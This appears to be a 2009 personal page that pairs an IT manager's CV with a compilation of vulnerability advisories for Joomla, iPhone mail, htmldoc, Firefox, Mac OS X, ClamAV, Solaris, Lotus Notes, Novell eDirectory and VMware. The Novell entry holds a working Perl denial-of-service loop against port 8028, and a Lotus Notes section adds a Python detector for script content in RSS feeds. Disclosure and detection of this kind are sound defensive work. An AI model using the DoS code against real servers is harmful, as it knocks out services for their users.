Georges Kut

IT Manager

  • Switzerland

Informatique-MTF  10-2009

Risk Management
Create corporate IT policy
Create disaster recovery plan
Work on AIX 6 Sun6, Sun7, Sun8, Sun10, RHEL, Ubuntu.
Add Nagios Monitoring with SMS alert.
Network Management

MCR&D 07-2008     07-2009

Project management, implementation of data acquisition in real-time Watchbox. Migration
web infrastructure, setting up IIS, Apache, tomcat. Administration of MS-SQL Server, MYSQL.
Web Development ASP, ASPX, PHP.


Technical Skills

System: OpenBSD, FreeBSD, Linux, Unix, AIX, Windows 2000 Server, Windows 2003 Server, Windows XP, Solaris, Windows Vista.

Security: Firewall, IpChains, Iptables, Checkpoint firewall, network sniffers, SSL, PGP/GnuPG,
PEM, Ethereal, Network stumbler, Snort, TripWire, Honeyd, SamHain, netfilter,
ipfilter, metasploit Framework, Psad, Nessus, aircrack, packet filter, ipfilter, ipfw, PIX

Networking: TCP/IP, VPN, VPN-SSL, DNS, DHCP, Active Directory, IPV6, WAN, LAN, NAT.

Monitoring : Mon, Nagios, Tcpdump, ZABBIX

DBMS: DB2, Mysql, Access, PostgreSQL, MSSql 2003, MSSql 2005.

Other: php, html, javascript, shellscript, SQL, Perl, Batch, ASP, ASPX.

Joomla! ‘com_pressrelease’ Component ‘id’ Parameter SQL Injection Vulnerability

Remote: Yes
Local: No
Published: Sep 10 2009 12:00AM
Updated: Sep 11 2009 06:31PM
Credit: Moudi
Vulnerable: Joomla com_pressrelease 0

Solution:
Currently we are not aware of any vendor-supplied patches.


iPhone email client does not validate SSL certificates

Info:

iPod/iPhone standard e-mail application does not validate SSL certificates
and is vulnerable to a MITM (man in the middle attack).

Vulnerable: All versions.

Discovered by: William Borskey wborskey (at) gmail (dot) com

Discussion:

The mail application that ships with the iPod/iPhone does not validate SSL
certificates. A malicious user can use software such as ettercap-ng to sniff
email passwords without the application warning the victim that the
certificate may be invalid.

Exploit:

This flaw can be exploited with ettercap-ng.


htmldoc

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2009:231
http://www.mandriva.com/security/
_______________________________________________________________________

Package : htmldoc
Date : September 11, 2009
Affected: 2009.0, 2009.1, Corporate 4.0
_______________________________________________________________________

Problem Description:

A security vulnerability has been identified and fixed in htmldoc:

Buffer overflow in the set_page_size function in util.cxx in HTMLDOC
1.8.27 and earlier allows context-dependent attackers to execute
arbitrary code via a long MEDIA SIZE comment. NOTE: it was later
reported that there were additional vectors in htmllib.cxx and
ps-pdf.cxx using an AFM font file with a long glyph name, but these
vectors do not cross privilege boundaries (CVE-2009-3050).

This update provides a solution to this vulnerability.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3050
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2009.0:
9ecff97cbcaa32de2c3bec214ae9ffb9 2009.0/i586/htmldoc-1.8.27-2.1mdv2009.0.i586.rpm
2dadb48ff604f983e379e3de3a3e2c58 2009.0/i586/htmldoc-nogui-1.8.27-2.1mdv2009.0.i586.rpm
3793881a911d590a4a4bc6d062203334 2009.0/SRPMS/htmldoc-1.8.27-2.1mdv2009.0.src.rpm

Mandriva Linux 2009.0/X86_64:
9353328eb2f962049d06e06515872df6 2009.0/x86_64/htmldoc-1.8.27-2.1mdv2009.0.x86_64.rpm
0cd7a69ece1fcb4a400357a3ab72cbd6 2009.0/x86_64/htmldoc-nogui-1.8.27-2.1mdv2009.0.x86_64.rpm
3793881a911d590a4a4bc6d062203334 2009.0/SRPMS/htmldoc-1.8.27-2.1mdv2009.0.src.rpm

Mandriva Linux 2009.1:
987394761cabb52d30a2936be12d45df 2009.1/i586/htmldoc-1.8.27-3.1mdv2009.1.i586.rpm
a856629efe866caa315898b8d8c032cf 2009.1/i586/htmldoc-nogui-1.8.27-3.1mdv2009.1.i586.rpm
811cc1df862042c1f861c195f6e257e8 2009.1/SRPMS/htmldoc-1.8.27-3.1mdv2009.1.src.rpm

Mandriva Linux 2009.1/X86_64:
bb3ef843a653cb80277157ec193ca1b8 2009.1/x86_64/htmldoc-1.8.27-3.1mdv2009.1.x86_64.rpm
22be1cebf3740a71bb76f299929c371e 2009.1/x86_64/htmldoc-nogui-1.8.27-3.1mdv2009.1.x86_64.rpm
811cc1df862042c1f861c195f6e257e8 2009.1/SRPMS/htmldoc-1.8.27-3.1mdv2009.1.src.rpm

Corporate 4.0:
56490816a2a8d3d3d998e1a5d6b614c3 corporate/4.0/i586/htmldoc-1.8.23-8.1.20060mlcs4.i586.rpm
4e7a0bda97b9a50858e1f8c16daa0c59 corporate/4.0/i586/htmldoc-nogui-1.8.23-8.1.20060mlcs4.i586.rpm
40616589d5ff1b6451b30fd9bdd424d4 corporate/4.0/SRPMS/htmldoc-1.8.23-8.1.20060mlcs4.src.rpm

Corporate 4.0/X86_64:
9bb6ca090589664fec4f17d9fec71a26 corporate/4.0/x86_64/htmldoc-1.8.23-8.1.20060mlcs4.x86_64.rpm
da5e19232e4f434433f3f8f243a42f6b corporate/4.0/x86_64/htmldoc-nogui-1.8.23-8.1.20060mlcs4.x86_64.rpm
40616589d5ff1b6451b30fd9bdd424d4 corporate/4.0/SRPMS/htmldoc-1.8.23-8.1.20060mlcs4.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFKql2LmqjQ0CJFipgRAk5XAKCdZk8QBWglAsYU/RiJGgsHhEhKXgCgsXAK
6pmbc1mT5js/qnxR5ZAFXKE=
=SAGe
-----END PGP SIGNATURE-----


Mozilla Firefox TreeColumns Dangling Pointer Vulnerability

ZDI-09-065: Mozilla Firefox TreeColumns Dangling Pointer Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-065
September 10, 2009

– CVE ID:
CVE-2009-3077

– Affected Vendors:
Mozilla Firefox

– Affected Products:
Mozilla Firefox 3

– TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8442.
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

– Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page.

The specific flaw exists during the redrawing of tree columns contained
within a XUL document. Due to the reuse of a previously freed object,
attacker controlled memory can be executed. Successful exploitation of
this vulnerability can lead to remote compromise of the affected system
under the credentials of the currently logged in user.

– Vendor Response:
Mozilla Firefox has issued an update to correct this vulnerability. More
details can be found at:

http://www.mozilla.org/security/announce/2009/mfsa2009-49.html

– Disclosure Timeline:
2009-07-28 – Vulnerability reported to vendor
2009-09-10 – Coordinated public release of advisory

– Credit:
This vulnerability was discovered by:
* Anonymous

– About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/


Apple Mac OS X Alias Manager Buffer Overflow Vulnerability

CVE: CVE-2009-2800
Remote: Yes
Local: No
Published: Sep 10 2009 12:00AM
Updated: Sep 11 2009 09:11AM
Credit: Apple
Vulnerable:
Apple Mac OS X Server 10.5.8
Apple Mac OS X Server 10.5.7
Apple Mac OS X Server 10.5.6
Apple Mac OS X Server 10.5.5
Apple Mac OS X Server 10.5.4
Apple Mac OS X Server 10.5.3
Apple Mac OS X Server 10.5.2
Apple Mac OS X Server 10.5.1
Apple Mac OS X Server 10.4.11
Apple Mac OS X Server 10.4.11
Apple Mac OS X Server 10.4.10
Apple Mac OS X Server 10.4.9
Apple Mac OS X Server 10.4.8
Apple Mac OS X Server 10.4.7
Apple Mac OS X Server 10.4.6
Apple Mac OS X Server 10.4.5
Apple Mac OS X Server 10.4.4
Apple Mac OS X Server 10.4.3
Apple Mac OS X Server 10.4.2
Apple Mac OS X Server 10.4.1
Apple Mac OS X Server 10.4
Apple Mac OS X Server 10.5
Apple Mac OS X 10.5.8
Apple Mac OS X 10.5.7
Apple Mac OS X 10.5.6
Apple Mac OS X 10.5.5
Apple Mac OS X 10.5.4
Apple Mac OS X 10.5.3
Apple Mac OS X 10.5.2
Apple Mac OS X 10.5.1
Apple Mac OS X 10.4.11
Apple Mac OS X 10.4.11
Apple Mac OS X 10.4.10
Apple Mac OS X 10.4.9
Apple Mac OS X 10.4.8
Apple Mac OS X 10.4.7
Apple Mac OS X 10.4.6
Apple Mac OS X 10.4.5
Apple Mac OS X 10.4.4
Apple Mac OS X 10.4.3
Apple Mac OS X 10.4.2
Apple Mac OS X 10.5

Solution:
The vendor has released an advisory and updates. Please see the references for details.

Apple Mac OS X Server 10.4.11

Apple Mac OS X 10.4.11

Apple Mac OS X Server 10.5.8

Apple Mac OS X 10.5.8


Apple Mac OS X ColorSync Heap Based Buffer Overflow Vulnerability

CVE: CVE-2009-2804
Remote: Yes
Local: No
Published: Sep 11 2009 12:00AM
Updated: Sep 11 2009 12:00AM
Credit: Apple
Vulnerable:
Apple Mac OS X Server 10.5.8
Apple Mac OS X Server 10.5.7
Apple Mac OS X Server 10.5.6
Apple Mac OS X Server 10.5.5
Apple Mac OS X Server 10.5.4
Apple Mac OS X Server 10.5.3
Apple Mac OS X Server 10.5.2
Apple Mac OS X Server 10.5.1
Apple Mac OS X Server 10.4.11
Apple Mac OS X Server 10.4.11
Apple Mac OS X Server 10.4.10
Apple Mac OS X Server 10.4.9
Apple Mac OS X Server 10.4.8
Apple Mac OS X Server 10.4.7
Apple Mac OS X Server 10.4.6
Apple Mac OS X Server 10.4.5
Apple Mac OS X Server 10.4.4
Apple Mac OS X Server 10.4.3
Apple Mac OS X Server 10.4.2
Apple Mac OS X Server 10.4.1
Apple Mac OS X Server 10.4
Apple Mac OS X Server 10.5
Apple Mac OS X 10.5.8
Apple Mac OS X 10.5.7
Apple Mac OS X 10.5.6
Apple Mac OS X 10.5.5
Apple Mac OS X 10.5.4
Apple Mac OS X 10.5.3
Apple Mac OS X 10.5.2
Apple Mac OS X 10.5.1
Apple Mac OS X 10.4.11
Apple Mac OS X 10.4.11
Apple Mac OS X 10.4.10
Apple Mac OS X 10.4.9
Apple Mac OS X 10.4.8
Apple Mac OS X 10.4.7
Apple Mac OS X 10.4.6
Apple Mac OS X 10.4.5
Apple Mac OS X 10.4.4
Apple Mac OS X 10.4.3
Apple Mac OS X 10.4.2
Apple Mac OS X 10.5

Solution:
The vendor has released an advisory and updates. Please see the references for details.

Apple Mac OS X Server 10.4.11

Apple Mac OS X 10.4.11

Apple Mac OS X Server 10.5.8

Apple Mac OS X 10.5.8


Joomla! ‘com_mediaalert’ Component ‘id’ Parameter SQL Injection Vulnerability

Remote: Yes
Local: No
Published: Sep 11 2009 12:00AM
Updated: Sep 11 2009 12:00AM
Credit: Moudi
Vulnerable: Joomla com_mediaalert 0


ClamAV Prior to 0.95.1 Multiple Remote Denial of Service Vulnerabilities

CVE: CVE-2009-1371, CVE-2009-1372
Remote: Yes
Local: No
Published: Apr 09 2009 12:00AM
Updated: Sep 10 2009 06:11PM
Credit: Martin Olsen and Nigel
Vulnerable:
Ubuntu Ubuntu Linux 8.10 sparc
Ubuntu Ubuntu Linux 8.10 powerpc
Ubuntu Ubuntu Linux 8.10 lpia
Ubuntu Ubuntu Linux 8.10 i386
Ubuntu Ubuntu Linux 8.10 amd64
MandrakeSoft Linux Mandrake 2009.0 x86_64
MandrakeSoft Linux Mandrake 2009.0
MandrakeSoft Linux Mandrake 2008.1 x86_64
MandrakeSoft Linux Mandrake 2008.1
MandrakeSoft Corporate Server 4.0 x86_64
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
MandrakeSoft Corporate Server 4.0
ifenslave ifenslave 0.88
Gentoo Linux
Clam Anti-Virus ClamAV 0.94.2
Clam Anti-Virus ClamAV 0.94.1
Clam Anti-Virus ClamAV 0.93.3
Clam Anti-Virus ClamAV 0.93.1
Clam Anti-Virus ClamAV 0.92.1
Clam Anti-Virus ClamAV 0.91.2
Clam Anti-Virus ClamAV 0.91.1
Clam Anti-Virus ClamAV 0.90.3
Clam Anti-Virus ClamAV 0.90.2
Clam Anti-Virus ClamAV 0.90.1
+ Debian Linux 4.0 sparc
+ Debian Linux 4.0 s/390
+ Debian Linux 4.0 powerpc
+ Debian Linux 4.0 mipsel
+ Debian Linux 4.0 mips
+ Debian Linux 4.0 m68k
+ Debian Linux 4.0 ia-64
+ Debian Linux 4.0 ia-32
+ Debian Linux 4.0 hppa
+ Debian Linux 4.0 arm
+ Debian Linux 4.0 amd64
+ Debian Linux 4.0 alpha
+ Debian Linux 4.0
Clam Anti-Virus ClamAV 0.90
– MandrakeSoft Corporate Server 4.0 x86_64
– MandrakeSoft Corporate Server 3.0 x86_64
– MandrakeSoft Corporate Server 3.0
– MandrakeSoft Corporate Server 4.0
– MandrakeSoft Linux Mandrake 2007.1 x86_64
– MandrakeSoft Linux Mandrake 2007.1
– MandrakeSoft Linux Mandrake 2007.0 x86_64
– MandrakeSoft Linux Mandrake 2007.0
Clam Anti-Virus ClamAV 0.88.5
Clam Anti-Virus ClamAV 0.88.4
Clam Anti-Virus ClamAV 0.88.3
Clam Anti-Virus ClamAV 0.88.2
Clam Anti-Virus ClamAV 0.88.1
Clam Anti-Virus ClamAV 0.87.1
Clam Anti-Virus ClamAV 0.87 -1
Clam Anti-Virus ClamAV 0.87
Clam Anti-Virus ClamAV 0.86.2
Clam Anti-Virus ClamAV 0.86 .1
Clam Anti-Virus ClamAV 0.86
Clam Anti-Virus ClamAV 0.85.1
Clam Anti-Virus ClamAV 0.85
Clam Anti-Virus ClamAV 0.84 rc2
Clam Anti-Virus ClamAV 0.84 rc1
Clam Anti-Virus ClamAV 0.84
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
Clam Anti-Virus ClamAV 0.83
Clam Anti-Virus ClamAV 0.82
Clam Anti-Virus ClamAV 0.81
+ Gentoo Linux
Clam Anti-Virus ClamAV 0.80 rc4
Clam Anti-Virus ClamAV 0.80 rc3
Clam Anti-Virus ClamAV 0.80 rc2
Clam Anti-Virus ClamAV 0.80 rc1
Clam Anti-Virus ClamAV 0.80
Clam Anti-Virus ClamAV 0.75.1
Clam Anti-Virus ClamAV 0.70
Clam Anti-Virus ClamAV 0.68 -1
Clam Anti-Virus ClamAV 0.68
Clam Anti-Virus ClamAV 0.67
+ Gentoo Linux 1.4 _rc3
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.4
Clam Anti-Virus ClamAV 0.65
Clam Anti-Virus ClamAV 0.60
Clam Anti-Virus ClamAV 0.54
Clam Anti-Virus ClamAV 0.53
Clam Anti-Virus ClamAV 0.52
Clam Anti-Virus ClamAV 0.51
Clam Anti-Virus ClamAV 0.95
Clam Anti-Virus ClamAV 0.94
Clam Anti-Virus ClamAV 0.93
Clam Anti-Virus ClamAV 0.92
Clam Anti-Virus ClamAV 0.91
Clam Anti-Virus ClamAV 0.88.6

Not Vulnerable:
Clam Anti-Virus ClamAV 0.95.1

Solution:
Updates are available. Please see the references for more information.

Clam Anti-Virus ClamAV 0.88.6

Ubuntu Ubuntu Linux 8.10 powerpc

Ubuntu Ubuntu Linux 8.10 sparc

Clam Anti-Virus ClamAV 0.95

MandrakeSoft Linux Mandrake 2009.0 x86_64

Clam Anti-Virus ClamAV 0.93

Ubuntu Ubuntu Linux 8.10 amd64

MandrakeSoft Linux Mandrake 2008.1 x86_64

MandrakeSoft Linux Mandrake 2008.1

Ubuntu Ubuntu Linux 8.10 i386

Clam Anti-Virus ClamAV 0.94

Ubuntu Ubuntu Linux 8.10 lpia

MandrakeSoft Linux Mandrake 2009.0

MandrakeSoft Corporate Server 4.0

Clam Anti-Virus ClamAV 0.91

Clam Anti-Virus ClamAV 0.92

Clam Anti-Virus ClamAV 0.51

Clam Anti-Virus ClamAV 0.52

Clam Anti-Virus ClamAV 0.53

Clam Anti-Virus ClamAV 0.54

Clam Anti-Virus ClamAV 0.60

Clam Anti-Virus ClamAV 0.65

Clam Anti-Virus ClamAV 0.67

Clam Anti-Virus ClamAV 0.68

Clam Anti-Virus ClamAV 0.68 -1

Clam Anti-Virus ClamAV 0.70

Clam Anti-Virus ClamAV 0.75.1

Clam Anti-Virus ClamAV 0.80 rc4

Clam Anti-Virus ClamAV 0.80

Clam Anti-Virus ClamAV 0.80 rc3

Clam Anti-Virus ClamAV 0.80 rc1

Clam Anti-Virus ClamAV 0.80 rc2

Clam Anti-Virus ClamAV 0.81

Clam Anti-Virus ClamAV 0.82

Clam Anti-Virus ClamAV 0.83

Clam Anti-Virus ClamAV 0.84

Clam Anti-Virus ClamAV 0.84 rc2

Clam Anti-Virus ClamAV 0.84 rc1

Clam Anti-Virus ClamAV 0.85

Clam Anti-Virus ClamAV 0.85.1

Clam Anti-Virus ClamAV 0.86 .1

Clam Anti-Virus ClamAV 0.86

Clam Anti-Virus ClamAV 0.86.2

Clam Anti-Virus ClamAV 0.87

Clam Anti-Virus ClamAV 0.87 -1

Clam Anti-Virus ClamAV 0.87.1

ifenslave ifenslave 0.88

Clam Anti-Virus ClamAV 0.88.1

Clam Anti-Virus ClamAV 0.88.2

Clam Anti-Virus ClamAV 0.88.3

Clam Anti-Virus ClamAV 0.88.4

Clam Anti-Virus ClamAV 0.88.5

Clam Anti-Virus ClamAV 0.90

Clam Anti-Virus ClamAV 0.90.1

Clam Anti-Virus ClamAV 0.90.2

Clam Anti-Virus ClamAV 0.90.3

Clam Anti-Virus ClamAV 0.91.1

Clam Anti-Virus ClamAV 0.91.2

Clam Anti-Virus ClamAV 0.92.1

Clam Anti-Virus ClamAV 0.93.1

Clam Anti-Virus ClamAV 0.93.3

Clam Anti-Virus ClamAV 0.94.1

Clam Anti-Virus ClamAV 0.94.2

MandrakeSoft Corporate Server 3.0

MandrakeSoft Corporate Server 3.0 x86_64

MandrakeSoft Corporate Server 4.0 x86_64


Sun Solaris lx Branded Zones Local Denial Of Service Vulnerability

Remote: No
Local: Yes
Published: Sep 09 2009 12:00AM
Updated: Sep 10 2009 05:21PM
Credit: Sun
Vulnerable:
Sun Solaris 10_x86
Sun OpenSolaris build snv_99
Sun OpenSolaris build snv_98
Sun OpenSolaris build snv_96
Sun OpenSolaris build snv_95
Sun OpenSolaris build snv_94
Sun OpenSolaris build snv_93
Sun OpenSolaris build snv_92
Sun OpenSolaris build snv_91
Sun OpenSolaris build snv_90
Sun OpenSolaris build snv_89
Sun OpenSolaris build snv_88
Sun OpenSolaris build snv_87
Sun OpenSolaris build snv_86
Sun OpenSolaris build snv_85
Sun OpenSolaris build snv_84
Sun OpenSolaris build snv_83
Sun OpenSolaris build snv_82
Sun OpenSolaris build snv_81
Sun OpenSolaris build snv_80
Sun OpenSolaris build snv_78
Sun OpenSolaris build snv_77
Sun OpenSolaris build snv_76
Sun OpenSolaris build snv_68
Sun OpenSolaris build snv_67
Sun OpenSolaris build snv_64
Sun OpenSolaris build snv_61
Sun OpenSolaris build snv_59
Sun OpenSolaris build snv_58
Sun OpenSolaris build snv_57
Sun OpenSolaris build snv_54
Sun OpenSolaris build snv_51
Sun OpenSolaris build snv_50
Sun OpenSolaris build snv_49
Sun OpenSolaris build snv_117
Sun OpenSolaris build snv_116
Sun OpenSolaris build snv_115
Sun OpenSolaris build snv_114
Sun OpenSolaris build snv_113
Sun OpenSolaris build snv_112
Sun OpenSolaris build snv_111a
Sun OpenSolaris build snv_111
Sun OpenSolaris build snv_110
Sun OpenSolaris build snv_109
Sun OpenSolaris build snv_108
Sun OpenSolaris build snv_107
Sun OpenSolaris build snv_106
Sun OpenSolaris build snv_105
Sun OpenSolaris build snv_104
Sun OpenSolaris build snv_104
Sun OpenSolaris build snv_103
Sun OpenSolaris build snv_102
Sun OpenSolaris build snv_101a
Sun OpenSolaris build snv_101
Sun OpenSolaris build snv_100

Not Vulnerable:
Sun OpenSolaris build snv_118

Solution:
Vendor updates are available.


Apple iPhone and iPod touch UIKit Deleted Password Character Information Disclosure Vulnerability

CVE: CVE-2009-2796
Remote: No
Local: Yes
Published: Sep 09 2009 12:00AM
Updated: Sep 10 2009 04:21PM
Credit: Abraham Vegh
Vulnerable:
Apple iPod Touch 2.2.1
Apple iPod Touch 2.0.2
Apple iPod Touch 2.0.1
Apple iPod Touch 1.1.4
Apple iPod Touch 1.1.3
Apple iPod Touch 1.1.2
Apple iPod Touch 1.1.1
Apple iPod Touch 3.0
Apple iPod Touch 2.2
Apple iPod Touch 2.1
Apple iPod Touch 2.0
Apple iPod Touch 1.1
Apple iPod Touch 0
Apple iPhone 3.0.1
Apple iPhone 2.2.1
Apple iPhone 2.0.2
Apple iPhone 2.0.1
Apple iPhone 1.1.4
Apple iPhone 1.1.3
Apple iPhone 1.1.2
Apple iPhone 1.1.1
Apple iPhone 1.0.2
Apple iPhone 1.0.1
Apple iPhone 3.0
Apple iPhone 2.2
Apple iPhone 2.1
Apple iPhone 2.0
Apple iPhone 1.1
Apple iPhone 1
Apple iPhone 0

Not Vulnerable:
Apple iPod Touch 3.1.1
Apple iPhone 3.1


IBM Lotus Notes 8.5 RSS Widget Privilege Escalation


scip AG Vulnerability ID 4021 (09/08/2009)
http://www.scip.ch/?vuldb.4021

I. INTRODUCTION

Lotus Notes is a client-server, collaborative application developed and
sold by IBM Software Group.

More information is available on the official product web site at the
following URL:

http://www.ibm.com/software/lotus/products/notes/

II. DESCRIPTION

Marc Ruef at scip AG found a design vulnerability in the current Release
8.5.

The product provides some widgets which can be added and enabled by the
user. One of those widgets provides a simple RSS reader.

This reader downloads the RSS file, extracts the items and saves them
locally as HTML files.

The interpretation and display of the RSS items is handled by the
Internet Explorer regarding the applied security zone.

III. EXPLOITATION

No exploitation is required. A malicious RSS feed may contain script
data or embedded objects.

IV. IMPACT

The RSS items are handled like web documents which introduces the
possibility of running script code or to embed multimedia objects (e.g.
Flash or movies).

Because locally saved files run in the Local Zone of the Internet
Explorer some privilege escalation is possible.

V. DETECTION

It may be possible to identify malicious RSS feeds if they contain
script code or embedded objects.

VI. SOLUTION

IBM has been informed immediately. They are able to address this
vulnerability with a hotfix.

VII. VENDOR RESPONSE

The vendor verified the existence of the issue and addressed it as soon
as possible with a hotfix. Unfortunately most of the communication
bypassed us and we were forced to ask for the current status several times.
Our last request for the current status on 08/24/2009 was unanswered.

VIII. SOURCES

scip AG – Security Consulting Information Process (german)
http://www.scip.ch/

scip AG – Vulnerability Database (german)
http://www.scip.ch/?vuldb.4021

computec.ch Document Database (german)
http://www.computec.ch/download.php

IX. DISCLOSURE TIMELINE

2009/04/07 Identification of the vulnerability.
2009/04/23 Notification of IBM via the customer.
2009/04/23 Technical knowhow exchange between scip AG/IBM.
2009/06/05 Asking for current status by scip AG. (no answer)
2009/07/09 Asking for current status by scip AG.
2009/07/09 Reply with current status and assigned PMR.
2009/08/24 Asking for current status by scip AG. (no answer)
2009/09/08 Public disclosure of the advisory.

X. CREDITS

The vulnerabilities were discovered by Marc Ruef.

Marc Ruef, scip AG, Zuerich, Switzerland
maru-at-scip.ch
http://www.scip.ch

A1. LEGAL NOTICES

Copyright (c) 2002-2009 scip AG, Switzerland.

Permission is granted for the re-distribution of this alert. It may not
be edited in any way without permission of scip AG.

The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. There are no
warranties with regard to this information. Neither the author nor the
publisher accepts any liability for any direct, indirect or
consequential loss or damage from use of or reliance on this advisory.
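
The check suggested under V. DETECTION, as an added Python example that is not part of the scip AG advisory: it parses an RSS feed and reports the items whose title or description carries script elements, embedded objects, inline event handlers or script URLs. The sample feed is constructed, and the tag and attribute lists are assumptions chosen for illustration.

```python
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Assumed lists for illustration; extend them to match local policy.
ACTIVE_TAGS = {"script", "object", "embed", "applet", "iframe"}
URL_ATTRS = {"href", "src", "data", "action"}
SCRIPT_SCHEMES = ("javascript:", "vbscript:")


class ActiveContentFinder(HTMLParser):
    """Collects markup that would run or load code if rendered as HTML."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names before this call.
        if tag in ACTIVE_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:
            value = (value or "").strip().lower()
            if name.startswith("on"):  # onload, onerror, onclick, ...
                self.findings.append(f"{name} event handler on <{tag}>")
            elif name in URL_ATTRS and value.startswith(SCRIPT_SCHEMES):
                self.findings.append(f"script URL in {name} of <{tag}>")


def find_active_content(html):
    """Scan one HTML fragment with a fresh parser and return its findings."""
    finder = ActiveContentFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


def scan_feed(rss_xml):
    """Map item title -> findings for every item that carries active content."""
    # ElementTree hands back entity-escaped and CDATA bodies alike as plain
    # text. For feeds fetched from untrusted servers a hardened XML parser
    # is preferable to the standard library one used here.
    root = ET.fromstring(rss_xml)
    report = {}
    for item in root.iter("item"):
        title = (item.findtext("title") or "(untitled)").strip()
        findings = []
        for field in ("title", "description"):
            findings += find_active_content(item.findtext(field) or "")
        if findings:
            report[title] = findings
    return report


# Constructed sample feed: one harmless item, one CDATA body with a script
# element, one entity-escaped body with an event handler, an object and a
# script URL.
SAMPLE_FEED = """<rss version="2.0"><channel><title>Constructed feed</title>
<item><title>Plain item</title>
<description>&lt;p&gt;Notes at &lt;a href="http://example.com/notes"&gt;example.com&lt;/a&gt;&lt;/p&gt;</description></item>
<item><title>Script item</title>
<description><![CDATA[<p>hello</p><script>alert(1)</script>]]></description></item>
<item><title>Object item</title>
<description>&lt;img src="x.png" onerror="alert(1)"&gt;&lt;object data="movie.swf"&gt;&lt;/object&gt;&lt;a href=" JavaScript:void(0)"&gt;x&lt;/a&gt;</description></item>
</channel></rss>"""

if __name__ == "__main__":
    for title, findings in scan_feed(SAMPLE_FEED).items():
        print(title, "->", "; ".join(findings))
```

A flagged item is a candidate for stripping or blocking before the reader writes it to disk, since the advisory's impact depends on the saved file being rendered as a local document.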


Novell eDirectory 8.8 SP5 Dhost Http Server DoS

Affected Software:

Novell eDirectory 8.8 SP5

Vulnerability Description:

Novell eDirectory 8.8 SP5 is vulnerable to a denial of service attack. If a remote attacker sends Unicode strings in an HTTP request to port 8028 (the default port of the Novell eDirectory Dhost HTTP server), the attacker can cause the system to consume 100% of the CPU resources.

Credits to:

Hellcode Research

Original Advisory:

http://tcc.hellcode.net/advisories/hellcode-adv003.txt

Exploit:

- snip -

….

# oversized request path
$data = "?" x 500000;

# the same request is sent 1000 times
for ($i = 0; $i < 1000; $i++)
{
    $sock = new IO::Socket::INET(
        PeerAddr => "localhost",
        PeerPort => 8028,
        Proto    => 'tcp',
        Type     => SOCK_STREAM,
    );
    print $sock "GET /$data HTTP/1.0\r\n\r\n";
    close($sock);
}

- snip -


VMware Frame Buffer Parameter Heap-Based Buffer Overflow Vulnerability

The VMware movie decoder contains the VMnc media codec that is required to play back movies recorded with VMware Workstation, VMware Player and VMware ACE, in any compatible media player. The movie decoder is installed as part of VMware Workstation, VMware Player and VMware ACE, or can be downloaded as a stand alone package.

Several vulnerabilities in the VMnc codec can be exploited to cause heap-based buffer overflows via specially crafted video files containing incorrect framebuffer parameters.

Credit:
The information has been provided by Alin Rad Pop and Will Dormann.

Vulnerable Systems:
* VMware Workstation Movie Decoder version 6.5.2 and prior
* VMware Workstation version 6.5.2 and prior
* VMware Player version 2.5.2 and prior
* VMware ACE version 2.5.2 and prior

Immune Systems:
* VMware Workstation Movie Decoder version 6.5.3
* VMware Workstation version 6.5.3
* VMware Player version 2.5.3
* VMware ACE version 2.5.3

Please review the patch/release notes for your product and version and verify the md5sum and/or the sha1sum of your downloaded file.

VMware Workstation Movie Decoder stand alone

http://www.vmware.com/download/ws/drivers_tools.html

http://download3.vmware.com/software/wkst/VMware-moviedecoder-6.5.3-185404.exe

md5sum: 2e9de20045c44bc1c03daa3e6fd9a611
sha1sum: 9cd8f9578223310db988131885ffda6c9a4de873

VMware Workstation 6.5.3

http://www.vmware.com/download/ws/
Release notes:
http://www.vmware.com/support/ws65/doc/releasenotes_ws653.html

For Windows

Workstation for Windows 32-bit and 64-bit
Windows 32-bit and 64-bit .exe
md5sum: 7565d16b7d7e0173b90c3b76ca4656bc
